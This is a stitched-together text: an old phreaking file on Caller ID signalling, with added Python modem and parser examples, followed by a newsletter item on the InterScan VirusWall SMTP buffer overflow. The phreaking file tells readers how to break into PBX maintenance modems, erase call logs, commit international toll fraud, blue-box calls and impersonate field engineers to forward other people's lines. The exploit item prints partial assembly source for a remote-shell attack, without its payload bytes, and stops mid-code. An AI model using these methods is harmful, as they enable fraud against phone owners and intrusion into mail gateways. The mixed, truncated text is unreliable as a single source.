The actual CID information is transmitted to the terminating subscriber loop, as I said before, between the first and second ring, implementing a Bell 202 type modem specification. There are 2 tones that are transmitted: one of them carries the mark transmission (logic 1) and the other carries the space transmission (logic 0), mark and space. The transmitted message contains a channel seizure string and then a mark string, followed by the actual caller information. If the receiving line only has basic CID service installed (where they only receive the date, time and number of the caller), SDMF (Single Data Message Format) is used in the CID data burst. If however the receiving person has a more advanced version of CID where they can see the name of the person calling, MDMF (Multiple Data Message Format) is used in the data burst. If the MDMF method is used and you have withheld your CID, the receiving line will only see a message saying the information was blocked by the caller, or is unavailable. Later I will discuss ways of making your line information completely unavailable to the called party.

In New Jersey in 1987, the first CID service was offered to subscribers of NJBell, because NJBell were at that time implementing new high-speed networks and wanted to rake in a little more money by offering this new service to their customers. Before SS7, ANI was used as a means of obtaining the calling number info for billing purposes on certain lines. Before SS7, your ANI would go no further than your central office, and would not be forwarded on international calls.
However, that was then and this is now. SS7 has been implemented big time over the international/national PSTN (Public Switched Telephone Network) and ANI can be a phreak's worst enemy. These days ANI information can be transmitted internationally, and in some cases globally, depending on the similarities of the signalling/switching systems concerned. Numbers that are renowned for implementing full ANI capture are 800 and 900 services (fully SS7 based) as well as operator services, and of course 911. ANI is _completely_ different from CID, so if you call a line that has an ANI service installed, you will not be able to block your line information from going through, as ANI works on a different protocol than CID; ie, the * services used to withhold your CID won't work on an ANI system because they are designed _only_ for blocking of CID, _not_ ANI. Remember, they are completely different things. There are a lot of rumours that I have heard from people about ANI, such as its supposed ability to capture your line information whichever method you use to call a number. The fact is, ANI is dependent on SS7, which in turn is dependent on translation tables; who says you have to use the SS7 network to call someone ;> I'll go into this further later in this file.

Now, back to CID. Because of the mass implementation of the SS7 protocol, CID information is transmitted to the called party's central office. This is done using SS7, and is called CPNM (Calling Party Number Message). Now, here's the bitch of SS7: when you call someone, your line information is sent to the person's central office _regardless_ of the fact that you may have requested that your line information is withheld.
If you have withheld your CID, the remote person's central office still gets your line information, but notes that you requested that your info be withheld (UNLESS the person you are calling has a deal with their local telco to have any CID information held at their central office automatically transmitted to their CID unit). That's where things begin to get nasty (at the end of the day, the telcos are more concerned about the money they are receiving for providing _full_ CID services to people, and couldn't care less if you requested that your line information remain private).

(lets get technical)
-- excerpted from CallerID specifications by Michael W. Slawson

Eventually standard CID (SDMF), where only the calling number and date etc are displayed, will be completely phased out and replaced by the enhanced CNAM (Calling Name Delivery), where the MDMF data burst transmission is used.

The CID information is sent serially at a rate of 1200 bits per second using continuous-phase binary frequency shift keying for modulation. The two frequencies used to represent the binary states are 1200 Hz for the Mark (logic 1) and 2200 Hz for the Space (logic 0). The data is sent asynchronously between the first and second ring at a signal level of -13.5 dBm. The level is measured at the central office across a 900 ohm test termination. Following a minimum of 500 ms after the end of the first ring, the sequence of transmission begins with a Channel Seizure. The Channel Seizure is a string of 300 continuous bits (250 ms) of alternating "0"s and "1"s. This string starts with a "0" and ends with a "1". A Mark Signal of 180 mark bits (150 ms) is sent immediately following the Channel Seizure Signal. The purpose of the Channel Seizure Signal and the Mark Signal is to prepare the data receiver in the Customer Premise Equipment (CPE) for the reception of the actual CID transmission.
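The modulation and preamble just described, as an added example that is not part of the original article or of the quoted specification: a small pure-Python Bell 202 style modem that builds the channel seizure and mark signal, frames each byte with the start (space) and stop (mark) bits that the next paragraph describes, modulates the bits as continuous-phase FSK and demodulates them again with a non-coherent mark/space energy detector. The bit rate, the 1200/2200 Hz tones and the 300/180-bit preamble lengths come from the spec; the 24 kHz sample rate, the function names, and the assumption that bit timing is already known (a real CPE recovers it from the alternating seizure pattern) are my own choices. The -13.5 dBm level and the 500 ms delay after the first ring are not modelled.

```python
"""Bell 202 style FSK physical layer for the Caller ID burst (added example,
not from the original article). Rates, tones and preamble lengths follow the
quoted spec; SAMPLE_RATE and the function names are assumptions of this example."""
import math

BIT_RATE = 1200        # bits per second (from the spec)
MARK_HZ = 1200         # logic 1
SPACE_HZ = 2200        # logic 0
SAMPLE_RATE = 24000    # assumed: 20 samples per bit keeps the pure-Python demodulator cheap
SAMPLES_PER_BIT = SAMPLE_RATE // BIT_RATE


def channel_seizure():
    """300 alternating bits (250 ms), starting with 0 and ending with 1."""
    return [i % 2 for i in range(300)]


def mark_signal():
    """180 mark bits (150 ms) that follow the channel seizure."""
    return [1] * 180


def frame_bytes(data):
    """Asynchronous framing: start bit (space), 8 data bits LSB first, stop bit (mark)."""
    bits = []
    for byte in data:
        bits.append(0)
        bits.extend((byte >> k) & 1 for k in range(8))
        bits.append(1)
    return bits


def deframe_bits(bits):
    """Inverse of frame_bytes; a bad start or stop bit is a framing error."""
    if len(bits) % 10:
        raise ValueError("bit stream is not a whole number of 10-bit characters")
    out = bytearray()
    for i in range(0, len(bits), 10):
        char = bits[i:i + 10]
        if char[0] != 0 or char[9] != 1:
            raise ValueError(f"framing error at bit {i}")
        out.append(sum(b << k for k, b in enumerate(char[1:9])))
    return bytes(out)


def build_burst(message):
    """Bits of a complete burst: channel seizure, mark signal, then the framed message."""
    return channel_seizure() + mark_signal() + frame_bytes(message)


def modulate(bits):
    """Continuous-phase BFSK: the phase accumulator carries across bit boundaries,
    so switching between 1200 Hz and 2200 Hz never produces a discontinuity."""
    samples, phase = [], 0.0
    for bit in bits:
        step = 2 * math.pi * (MARK_HZ if bit else SPACE_HZ) / SAMPLE_RATE
        for _ in range(SAMPLES_PER_BIT):
            samples.append(math.sin(phase))
            phase = (phase + step) % (2 * math.pi)
    return samples


def _tone_energy(chunk, freq):
    """Energy of one bit window at freq. Using both an I and a Q correlator makes
    the decision independent of the carrier phase at the start of the window."""
    i = sum(s * math.cos(2 * math.pi * freq * n / SAMPLE_RATE) for n, s in enumerate(chunk))
    q = sum(s * math.sin(2 * math.pi * freq * n / SAMPLE_RATE) for n, s in enumerate(chunk))
    return i * i + q * q


def demodulate(samples):
    """Decide each bit by comparing mark and space energy over its window.
    Assumes bit timing is known (the CPE recovers it from the channel seizure)."""
    bits = []
    for i in range(0, len(samples) - SAMPLES_PER_BIT + 1, SAMPLES_PER_BIT):
        chunk = samples[i:i + SAMPLES_PER_BIT]
        bits.append(1 if _tone_energy(chunk, MARK_HZ) > _tone_energy(chunk, SPACE_HZ) else 0)
    return bits


def decode_burst(samples):
    """Demodulate a whole burst, check the preamble, and return the message bytes."""
    bits = demodulate(samples)
    if bits[:300] != channel_seizure() or bits[300:480] != mark_signal():
        raise ValueError("channel seizure / mark signal not found")
    return deframe_bits(bits[480:])


if __name__ == "__main__":
    msg = b"\x04\x12"   # constructed: an SDMF type word and an 18-character length word
    print("round trip ok:", decode_burst(modulate(build_burst(msg))) == msg)
```

With 20 samples per bit a mark window holds exactly one 1200 Hz cycle, so the matched correlator sees close to its full value while the mismatched one is held to a small leakage term; that margin is what lets the simple energy comparison decide reliably. A burst whose first 480 bits are not the seizure and mark pattern is rejected before deframing, which is also a handy sanity check when looking at captured line audio.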
Once the Channel Seizure and Mark Signals have been sent, the CID information is then transmitted starting with the Least Significant Bit (LSB) of the most significant character. This is true for both SDMF and MDMF. Each character in the message consists of 8 bits. For displayable characters these bits represent a code defined by the American Standard Code for Information Interchange (ASCII). When transmitted, the character's 8 bits are preceded by a start bit (space) and followed by a stop bit (mark), giving a total of 10 bits sent for each character. The CID information is followed by a checksum for error detection. Figure 1 shows a visual layout depicting the association of the 1st Ring, Channel Seizure Signal, Mark Signal, Caller ID information, Checksum, and the 2nd Ring.

The checksum word is the two's complement of the modulo 256 sum of the other words of the message. The Channel Seizure and Mark Signals are not included in this checksum. When the message is received by the CPE, it checks for errors by taking the received checksum word and adding the modulo 256 sum of all of the other words received in the message. The addition done by the CPE does not include the Channel Seizure and Mark Signals, nor does it include the received checksum word. The result of this addition should be zero to indicate that no errors have been detected.

Figure 2 shows a CID message in SDMF. For ease in describing the process of determining the checksum, the decimal values will be used for the calculations.
Character             Decimal  ASCII  Actual
Description           Value    Value  Bits (LSB)
-------------------   -------  -----  ---------------
Message Type (SDMF)       4           0 0 0 0 0 1 0 0
Message Length (9)       18           0 0 0 1 0 0 1 0
Month (December)         49      1    0 0 1 1 0 0 0 1
                         50      2    0 0 1 1 0 0 1 0
Day (25)                 50      2    0 0 1 1 0 0 1 0
                         53      5    0 0 1 1 0 1 0 1
Hour (3pm)               49      1    0 0 1 1 0 0 0 1
                         53      5    0 0 1 1 0 1 0 1
Minutes (30)             51      3    0 0 1 1 0 0 1 1
                         48      0    0 0 1 1 0 0 0 0
Number (6061234567)      54      6    0 0 1 1 0 1 1 0
                         48      0    0 0 1 1 0 0 0 0
                         54      6    0 0 1 1 0 1 1 0
                         49      1    0 0 1 1 0 0 0 1
                         50      2    0 0 1 1 0 0 1 0
                         51      3    0 0 1 1 0 0 1 1
                         52      4    0 0 1 1 0 1 0 0
                         53      5    0 0 1 1 0 1 0 1
                         54      6    0 0 1 1 0 1 1 0
                         55      7    0 0 1 1 0 1 1 1
Checksum                 79           0 1 0 0 1 1 1 1

The first step is to add up the values of all of the fields (not including the checksum). In this example the total would be 945. This total is then divided by 256. The quotient is discarded and the remainder (177) is the modulo 256 sum. The binary equivalent of 177 is 10110001. To get the two's complement, start with the ones' complement (01001110), which is obtained by inverting each bit, and add 1. The two's complement of binary 10110001 is 01001111 (decimal 79). This is the checksum that is sent at the end of the CID information.

When the CPE receives the CID message it also does a modulo 256 sum of the fields; however, it does not do a two's complement. If the two's complement of the modulo 256 sum (01001111) is added to just the modulo 256 sum (10110001), the result will be zero. If the result is not zero then the message is discarded. It is important to note that there is no error correction in this method. Even if the CPE were to notify the central office of errors, the central office will not retransmit the information. If an error is detected, the CPE receiving the message should display an error message or nothing at all. Although Bellcore SR-TSV-002476 recommends that the CPE display an error message if erroneous data is received, most CPE manufacturers have elected to just ignore the errored message.
The content of the CID message itself depends on whether it is in SDMF or MDMF. A message in SDMF includes a Message Type word, a Message Length word, and the actual Message words. A message in MDMF also includes a Message Type word, a Message Length word, and the actual Message words, but additionally includes Parameter Type and Parameter Length words. There are certain points within these messages where up to 10 Mark bits may be inserted to allow for equipment delays in the central office. These Stuffed Mark bits are generally not necessary.

The Message Type word defines whether the message is in SDMF or MDMF. It will be a binary 00000100 (decimal 4) for SDMF or a binary 10000000 (decimal 128) for MDMF. The Message Length word gives the number of characters in the message. This length does not include the checksum at the end of the message. For SDMF the minimum length will be 9 characters. The minimum length for MDMF will depend on whether the customer has subscribed to CNAM service as well as CND. In the case of CND only, the minimum length will be 13 characters. If the customer also has CNAM then the minimum will be 16 characters. In all three of the minimums mentioned there will be no actual number or name delivered. The field will be marked either "O" (Out of area) or "P" (Private).

Figure 3 shows an example of a minimum message layout for SDMF. The number will not be delivered because it has been blocked by the calling party. The CPE will receive the date, time, and a "P" to indicate that the caller's identification has been blocked at the caller's request.
Character             Decimal  ASCII  Actual
Description           Value    Value  Bits (LSB)
-------------------   -------  -----  ---------------
Message Type (SDMF)       4           0 0 0 0 0 1 0 0
Message Length (9)        9           0 0 0 0 1 0 0 1
Month (December)         49      1    0 0 1 1 0 0 0 1
                         50      2    0 0 1 1 0 0 1 0
Day (25)                 50      2    0 0 1 1 0 0 1 0
                         53      5    0 0 1 1 0 1 0 1
Hour (3pm)               49      1    0 0 1 1 0 0 0 1
                         53      5    0 0 1 1 0 1 0 1
Minutes (30)             51      3    0 0 1 1 0 0 1 1
                         48      0    0 0 1 1 0 0 0 0
Private                  80      P    0 1 0 1 0 0 0 0
Checksum                 16           0 0 0 1 0 0 0 0

Character                   Decimal  ASCII  Actual
Description                 Value    Value  Bits (LSB)
--------------------------  -------  -----  ---------------
Message Type (MDMF)           128           1 0 0 0 0 0 0 0
Message Length (33)            33           0 0 1 0 0 0 0 1
Parameter Type (Date/Time)      1           0 0 0 0 0 0 0 1
Parameter Length (8)            8           0 0 0 0 1 0 0 0
Month (November)               49      1    0 0 1 1 0 0 0 1
                               49      1    0 0 1 1 0 0 0 1
Day (28)                       50      2    0 0 1 1 0 0 1 0
                               56      8    0 0 1 1 1 0 0 0
Hour (3pm)                     49      1    0 0 1 1 0 0 0 1
                               53      5    0 0 1 1 0 1 0 1
Minutes (43)                   52      4    0 0 1 1 0 1 0 0
                               51      3    0 0 1 1 0 0 1 1
Parameter Type (Number)         2           0 0 0 0 0 0 1 0
Parameter Length (10)          10           0 0 0 0 1 0 1 0
Number (6062241359)            54      6    0 0 1 1 0 1 1 0
                               48      0    0 0 1 1 0 0 0 0
                               54      6    0 0 1 1 0 1 1 0
                               50      2    0 0 1 1 0 0 1 0
                               50      2    0 0 1 1 0 0 1 0
                               52      4    0 0 1 1 0 1 0 0
                               49      1    0 0 1 1 0 0 0 1
                               51      3    0 0 1 1 0 0 1 1
                               53      5    0 0 1 1 0 1 0 1
                               57      9    0 0 1 1 1 0 0 1
Parameter Type (Name)           7           0 0 0 0 0 1 1 1
Parameter Length (9)            9           0 0 0 0 1 0 0 1
Name (Joe Smith)               74      J    0 1 0 0 1 0 1 0
                              111      o    0 1 1 0 1 1 1 1
                              101      e    0 1 1 0 0 1 0 1
                               32           0 0 1 0 0 0 0 0
                               83      S    0 1 0 1 0 0 1 1
                              109      m    0 1 1 0 1 1 0 1
                              105      i    0 1 1 0 1 0 0 1
                              116      t    0 1 1 1 0 1 0 0
                              104      h    0 1 1 0 1 0 0 0
Checksum                       88           0 1 0 1 1 0 0 0

In Figure 4, if the number and name had not been included, then the parameter types for those fields would be different. These alternate parameter types are used to signify that the data contained in that parameter is the reason for its absence.
The parameter type for the number section would have been a binary 00000100 (decimal 4) and the parameter type for the name section would have been a binary 00001000 (decimal 8). When the parameter type signifies that the data contained is the reason for that field's absence, the parameter length is always a binary 00000001 (decimal 1). If the reason for absence is that the calling party does not want their number/name displayed, then the parameter data would be a binary 01010000 (ASCII "P") for Private. If the reason for absence is that the information is just not available, then the parameter data would be a binary 01001111 (ASCII "O") for Out of area. The number/name may not be available if the calling party is not served by a central office capable of relaying the information on through the network.

(lets talk d1rty)

The above specifications are relevant to the US CID system, and not to the UK specification. Enough of the technical stuff for now though; it's time to look at CID systems from an attack and defense point of view. First the real basics: if you are in the US you can request that your CID is withheld by using *67 as a prefix when dialing a number. As I said before though, this is absolutely useless in completely withholding your CID, because we know that CID information is passed on to the called party's central office regardless of *67 via the SS7 network. If you are in the UK you would prefix your call with 141, but again our nice System X digital exchanges are real bitches at passing on our CID information to _other_ exchanges, so in essence your call routing is logged as it passes through exchange boundaries on the PSTN. So here I am going to discuss different techniques that can be used to completely render your CID information useless as it is transmitted through various exchanges and offices. I'm going to begin with some basic concepts so you can understand the more advanced techniques better.
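Before moving on, the SDMF and MDMF layouts and the checksum rule from the (lets get technical) section above, as an added example (not code from the original article or from the Slawson specification): a builder for both formats and a receiver-side parser that performs the same modulo-256 zero check the CPE does. The type words (4 and 128), the parameter types (1 date/time, 2 number, 7 name, and 4 or 8 for an absent number or name carrying "P"/"O" as the one-character reason), and the minimum lengths come from the text; the function names, the `cnam` switch and the dictionary that `parse()` returns are my own. Run stand-alone it rebuilds Figures 2, 3 and 4 from their field values and prints the checksum words 79, 16 and 88.

```python
"""SDMF / MDMF Caller ID message layer: builder, checksum and receiver-side
parser (added example, not from the original article). Type words, parameter
types and the checksum rule follow the quoted spec; the function names and the
dict layout returned by parse() are assumptions of this example."""

SDMF = 0x04             # Message Type word for SDMF
MDMF = 0x80             # Message Type word for MDMF
P_DATETIME = 0x01       # MDMF parameter types named in the spec
P_NUMBER = 0x02
P_NUMBER_ABSENT = 0x04  # data is the reason: "P" private / "O" out of area
P_NAME = 0x07
P_NAME_ABSENT = 0x08


def checksum(words):
    """Two's complement of the modulo-256 sum of every word (type, length, body)."""
    return (-sum(words)) & 0xFF


def build_sdmf(mmddhhmm, number):
    """SDMF: type, length, 8 date/time characters, then the number (or "P"/"O")."""
    body = (mmddhhmm + number).encode("ascii")
    words = bytes([SDMF, len(body)]) + body
    return words + bytes([checksum(words)])


def build_mdmf(mmddhhmm, number=None, name=None, cnam=True, reason="O"):
    """MDMF: type, length, then (type, length, data) parameters. A missing number
    or name is sent as the 'absent' parameter type with a one-character reason.
    The name parameter is only present when the subscriber has CNAM."""
    params = bytes([P_DATETIME, 8]) + mmddhhmm.encode("ascii")
    if number is None:
        params += bytes([P_NUMBER_ABSENT, 1]) + reason.encode("ascii")
    else:
        params += bytes([P_NUMBER, len(number)]) + number.encode("ascii")
    if cnam:
        if name is None:
            params += bytes([P_NAME_ABSENT, 1]) + reason.encode("ascii")
        else:
            params += bytes([P_NAME, len(name)]) + name.encode("ascii")
    words = bytes([MDMF, len(params)]) + params
    return words + bytes([checksum(words)])


def parse(msg):
    """Receiver side: check the length word and the checksum the way the CPE does
    (modulo-256 sum of all words, checksum included, must be zero) and return the
    decoded fields. There is no error correction, so a bad message is rejected."""
    if len(msg) < 3:
        raise ValueError("message too short")
    mtype, length = msg[0], msg[1]
    if len(msg) != length + 3:
        raise ValueError(f"length word {length} does not match {len(msg) - 3} body words")
    if sum(msg) & 0xFF:
        raise ValueError("checksum mismatch, message discarded")
    body = msg[2:-1]
    if mtype == SDMF:
        if length < 9:
            raise ValueError("SDMF message shorter than the 9-character minimum")
        return {"type": "SDMF", "datetime": body[:8].decode("ascii"),
                "number": body[8:].decode("ascii")}
    if mtype == MDMF:
        fields, i = {"type": "MDMF"}, 0
        names = {P_DATETIME: "datetime", P_NUMBER: "number", P_NAME: "name",
                 P_NUMBER_ABSENT: "number_absent", P_NAME_ABSENT: "name_absent"}
        while i < len(body):
            if i + 2 > len(body):
                raise ValueError("truncated parameter header")
            ptype, plen = body[i], body[i + 1]
            data = body[i + 2:i + 2 + plen]
            if len(data) != plen:
                raise ValueError("truncated parameter data")
            fields[names.get(ptype, f"param_{ptype:#04x}")] = data.decode("ascii", "replace")
            i += 2 + plen
        return fields
    raise ValueError(f"unknown message type {mtype:#04x}")


if __name__ == "__main__":
    # Figures 2, 3 and 4 from the spec, rebuilt from their field values
    fig2 = build_sdmf("12251530", "6061234567")               # checksum word 79
    fig3 = build_sdmf("12251530", "P")                        # checksum word 16
    fig4 = build_mdmf("11281543", "6062241359", "Joe Smith")  # checksum word 88
    for m in (fig2, fig3, fig4):
        print(m[-1], parse(m))
```

`parse()` rejects a message on any length or checksum mismatch rather than trying to repair it, which matches the spec's point that the CPE should display an error or nothing at all. The checksum is a plain sum, so it catches a single corrupted word but not every pair of errors that cancel each other modulo 256.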
Now, let's consider this scenario for the following techniques: you are in Texas (RBOC: SWBell) and you want to set up a call to someone in Chicago (Ameritech). Obviously, you know that *67 won't help you if the person you are calling has full CID (or has access to their central office ;>), so you consider the following techniques and call-setup examples.

[ example A: simple diverting ]

Here you use a host that will be traced back to in the event that the person has full CID. In other words, it's real simple: you use a PBX (preferably a long distance one located in another RBOC). This is very self explanatory, but a lot of people get it wrong. Here's how the call setup would look in a metaphorical diagram:

______ ______ ______ | | | | | | (800)XXX-XXXX | CO |------------->| CO |------->| PBX | POTS:(123)456-7890 |______| |______|<-------|______| | | | | | __|___ ( you ) | | | CO |----------------------> ( them ) |______|

Now, what's happening here is you are calling the PBX at *671800XXXXXXX, you then log in to the PBX and from there you dial the person you want to call. When the person checks their CID unit, they will see the number of the PBX you are calling from instead of your actual originating number. Now, this is OK for very very very simple CID spoofing, but if the person you are calling is resourceful, they could very easily have words with the host from which you were calling (who would have your ANI - it's an 800 number). The CO of the PBX would also have the time, date, and trunk setup information for when you called the PBX etc, so this example is still not quite as effective as you would imagine it to be. Now, to make a long story short, we can enhance the above method by implementing our _own_ CID blocking methods along the above routing example.
Look at the diagram in detail, and you will realise that there can be many different alterations made that can make the routing a lot safer, and _a lot_ more hassle for them to pin-point your OCP, or originating point. First we take into account the call we make to the PBX. For starters, you can op-divert to the 800 number (depending on where you live) so the 800 PBX receives operator assisted call ANI instead of yours. This can be done very easily, and involves you calling your local operator and asking them to call the number for you. The central office located near to the PBX then has the OPC of your operator, rather than you.

Now, the PBX host is your safeguard when it comes to hiding your CID. For those of you who don't know, all PBXs or privately owned switching and trunking mechanisms/systems log incoming and outgoing trunk setups for billing purposes etc. These days, most PBX exchanges have administration modules that deal with call routing. The call-setups are stored in the databases of the PBXs and can be intercepted. Most of the time, a PBX will have 1 if not several dialin modems that connect to the PBX administration modules for remote maintenance. It's simply a case of internally scanning the extensions of the remote PBX for a carrier, and checking out each one until you find what you are looking for. Once you have access, you could do _many_ things depending on how advanced the system is. For example, you could erase any log of your connection to the PBX (as well as any future connections), you can set up incoming and outgoing trunks on the PBX exchange that don't even exist, and you can also select which trunk you wish to call your party with, thereby selecting which number you wish to be displayed to the called party. I won't go into too much detail here, you get the picture right?
So now we are using a host to call through that will not log anything that could point towards you, with the exception of the timestamping at the central offices along the routing path (again, that could be dealt with in a similar fashion). You could also implement op-diverting from the PBX to the dialed person, or triple the amount of hosts you use to place the call at the same time using the above methods, but via more PBXs and operators. In my opinion though, the above method is nowhere near as secure as you need it to be, so in the next examples we take advantage of LD carriers and global PSTN networks that do not co-operate with each other, ie: calling party data is not translatable or transmittable (electromechanical).

Now, to really throw someone off track in the event of a trace (realtime or aftermath), we take advantage of one of the biggest flaws in the PSTN known today: new digital exchange units such as digital ESS, System X etc cannot effectively communicate with older, less widely implemented electromechanical exchanges such as crossbar, and CCITT#5 protocols implemented in less developed countries such as Indonesia, Libya etc. The world's telcos are also very lazy when it comes to passing on originating calling party information from country to country, simply because it is too much hassle for them; time and money come into the picture once more. So LD call setups become a good counter defense when it comes to routing untraceable calls. Now, I can think of literally 100s of methods that could be implemented here, but I'm going to discuss the structure of how this type of call would be set up; I'll leave the rest to your imagination (if you have one).

[ example B: international routing ]

Now, consider the previous call setup example, and imagine how it would be trunked if you placed a long distance barrier in between. Here we will imagine we have 2 PBXs, one in the US and one in the UK.
Again, you are in Texas and want to set up a call to someone in Chicago without revealing your identity. The basic call setup would appear like this:

______ ______ ______ | | | | | | (800)XXX-XXXX | CO |------------->| CO |------->| PBX | POTS:(123)456-7890 |______| |______|<-------|______| | | ___ | [ US PSTN ] | ESS routing .--->|co | | __|___ ____|_ |___|------ ( them ) ( you ) | | | | | CO |------->| DMS | (international DMS |______| |______| gateway router) : : : [ super LD ] .........................\........................ \ : So here you have op diverted : to the US PBX, then from the : US PBX op diverted and called ______ ___:__ the PBX in the UK, already | |------->| | the UK PBX has lost the US | CO |<-------| DMS | (international DMS PBXs CID, and from the UK PBX |______| |______| gateway router) you call the person in chicago, |: which in turn is re-routed back |: through the international PSTN |: [ UK PSTN ] systemx routing effectivly deteriating your __|:__ origionating line. | | | PBX | (UK PBX) |______|

The problem with this kind of routing example is that you are costing the 2 PBX exchanges involved big bux, and it is generally not a very nice thing to do, heh. Again, as in the previous example, you can implement the PBX administration for extra security; the above diagram could be used vice versa whether your originating point was the UK or US. It is however inconvenient, both for you and for the poor owners of the PBXs who have to fork out for your toll-fraud adventures. There are however other ways of implementing the above techniques. Now, probably the most favourable technique to use would be to box your way out of a country that runs C5, and from there re-route a call back to the US, and even implement a few PBXs along the way; therefore you would have [ 0 ] CID worries. A more advanced technique involves the forwarding of subscriber lines to a designated number (a C5 country direct, PBX etc).
Now, if you are in the US, you could be super lame and simply have another US line forwarded to another number by posing to the forwarded line's CO as a field engineer requesting a line be forwarded to xxx while you carry out field 'maintenance' on it, _or_ if you wanna stay away from the lameness, you could do this: let's take Indonesia for example. You can remotely forward an Indonesian residential line to anywhere you want (providing you can find an English speaking exchange). Indonesia is just an example, but like the US method of forwarding lines you have 2 options. You could a) pose as a local field engineer, or b) if the country has a DMS[+] architecture you could forward the lines by means of remote switch access. (That's another file, but you get the general idea.) So, when it comes down to it, it's all about having the ability to route calls, not spoof them.

So, there you have it, a brief guide to CID blocking (the effective way). It's your choice: *67 (blah) or *67,00-->1800XXXXXXX-->*67,00-->1800XXXXXX(CD)--> KP2-44-141-0800-XXXXXXX-ST -->001-1800XXXXXXX-->*67,00-->555-555-5555 hello? :>

I hope you enjoyed this file as much as I did writing it, take it easy and remember to check out my website.. :)

Shouts to 9x, substance, downtime, ch1ckie, oclet, jasun, zomba, psyclone, bodie, digiphreq, w1repa1r, gr1p, t1p, jorge, b4b0, shadowx, osiris, essgurl, lowtek, pbxphreak, katkilla, drphace, prez, euk, simmeth, dgtlfokus, voltage,

                          ___ ___  _____.___.____________________ ____________
 http://hybrid.dtmf.org  /   |   \\__ |   |\______   \______    \/_   \______    \
 hybrid@b4b0.org        /    ~    \/   |   | |    |  _/|   _/  |   ||   |     \
 hybrid@ninex.com       \    Y    /\____   | |    |   \|   |    \  |   ||   hy_   \
 hybrid@dtmf.org         \___|_  / / ______| |______  /|____|_  / |___/_______  /
 +++ NO CARRIER               \/  \/         :       \/        \/            .
                                                                              \/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: cp850

iQEVAwUBN5dSy7TUyHciIYgJAQGcSgf/er3ngPoYsPon9rmU4VG0klcp9koc5aoA
hBBheVxeeVQOzrUl0kPv5sCUPdHoEKbabHqAyDcoJY9feoM5aZ4U0kryuTBm415z
M57ff31CH+T+8iUaW7ZlQkBfFuJfNr2B3pro6KvDGzU2S7nJhYSCugoCf3IExlLt
+FSXEAl+HC0PCpDcEYlQ+2kNwgOBMLLQ9w3On/vFcRJnD26E9Hk4j5IMv8iv+37F
sdQDDhqQ3ah2y1CN3KGAOrcsaYRhT1OyLjbw+JDwR1buCa38yqawBjpbAuM/PTfU
eoNCmwzFEucjcFKpQJisT1428MgeuK2cWmIj8flfuIr9fhIi/7wdNA==
=570J
-----END PGP SIGNATURE-----

@HWA

45.0 A buffer overflow exists on the VirusWall smtp gateway
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by duro

A buffer overflow exists on the VirusWall SMTP gateway: by sending a long HELO command you can overflow the buffer and execute arbitrary code. Example code has been written which will spawn a command prompt on a port you specify.

Before you shrug this one off, take a look:

Connected to mail1.microsoft.com.
Escape character is '^]'.
220 mail1.microsoft.com InterScan VirusWall NT ESMTP 3.23 (build 9/10/99) ready at Sun, 07 Nov 1999 03:38:44 -0800 (Pacific Standard Time)

The ironic thing here is, VirusWall was designed to prevent viruses and 'malicious code'. Obviously not a lot of thought was taken before laying their trust in 3rd party 'security' products. A quick note to the millions out there who would give their right arm to compromise Microsoft's network - sorry, their firewall would prevent the payload from spawning a remote shell.. unless of course it was modified to stop an existing service to open a port :)

Exploit source and binary is available at http://www.beavuh.org. Credit to Liraz Siri for bringing this to our attention. Hi to eEye/w00w00/teso.

; Interscan VirusWall 3.23/3.3 remote.
;
; The binary is available at http://www.beavuh.org.
;
; To assemble:
;
; tasm32 -ml vwxploit.asm
; tlink32 -Tpe -c -x vwxploit.obj ,,, import32
;
; TASM 5 required!
;
; dark spyrit
;
.386p
locals
jumps
.model flat, stdcall

extrn GetCommandLineA:PROC
extrn GetStdHandle:PROC
extrn WriteConsoleA:PROC
extrn ExitProcess:PROC
extrn WSAStartup:PROC
extrn connect:PROC
extrn send:PROC
extrn recv:PROC
extrn WSACleanup:PROC
extrn gethostbyname:PROC
extrn htons:PROC
extrn socket:PROC
extrn inet_addr:PROC
extrn closesocket:PROC
extrn Sleep:PROC

.data

sploit_length323 equ 1314
sploit323:
    ; 1314-byte payload for 3.23 (NOP sled, shellcode, trailer) not reproduced
store dw ?
    ; remainder of the 3.23 payload not reproduced

sploit_length33 equ 794
sploit33:
    ; 794-byte payload for 3.3 (NOP sled, shellcode, trailer) not reproduced
store2 dw ?
    ; remainder of the 3.3 payload not reproduced

logo db "Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.", 13, 10
     db "by dark spyrit ",13,10,13,10
     db "usage: vwxploit ", 13, 10
     db "eg - vwxploit host.com 25 1234 3.23",13,10,0
logolen equ $-logo

errorinit db 10,"error initializing winsock.", 13, 10, 0
errorinitl equ $-errorinit
derror db 10,"error.",13,10,0
derrorl equ $-derror
nohost db 10,"no host or ip specified.", 13,10,0
nohostl equ $-nohost
noport db 10,"no port specified.",13,10,0
noportl equ $-noport
no_port2 db 10,"no bind port specified.",13,10,0
no_port2l equ $-no_port2
response db 10,"waiting for response....",13,10,0
respl equ $-response
reshost db 10,"error resolving host.",13,10,0
reshostl equ $-reshost
sockerr db 10,"error creating socket.",13,10,0
sockerrl equ $-sockerr
ipill db 10,"ip error.",13,10,0
ipilll equ $-ipill
cnerror db 10,"error establishing connection.",13,10,0
cnerrorl equ $-cnerror
success db 10,"sent.. spawn connection now.",13,10,0
successl equ $-success
verzion db 10,"please specify a valid version.",13,10,0
verzionl equ $-verzion

console_in dd ?
console_out dd ?
bytes_read dd ?

wsadescription_len equ 256
wsasys_status_len equ 128

WSAdata struct
    wVersion dw ?
    wHighVersion dw ?
    szDescription db wsadescription_len+1 dup (?)
    szSystemStatus db wsasys_status_len+1 dup (?)
    iMaxSockets dw ?
    iMaxUdpDg dw ?
    lpVendorInfo dw ?
WSAdata ends

sockaddr_in struct
    sin_family dw ?
    sin_port dw ?
    sin_addr dd ?
    sin_zero db 8 dup (0)
sockaddr_in ends

wsadata WSAdata <?>
sin sockaddr_in <?>
sock dd ?
numbase dd 10
version db 0
_port db 256 dup (?)
_host db 256 dup (?)
_port2 db 256 dup (?)
buffer db 1000 dup (0)

.code
start:
    call init_console
    push logolen
    push offset logo
    call write_console

    ; locate the first argument on the command line
    call GetCommandLineA
    mov edi, eax
    mov ecx, -1
    xor al, al
    push edi
    repnz scasb
    not ecx
    pop edi
    mov al, 20h
    repnz scasb
    dec ecx
    cmp ch, 0ffh
    jz @@0
    test ecx, ecx
    jnz @@1
@@0:
    push nohostl
    push offset nohost
    call write_console
    jmp quit3
@@1:
    mov esi, edi
    lea edi, _host
    call parse
    or ecx, ecx
    jnz @@2
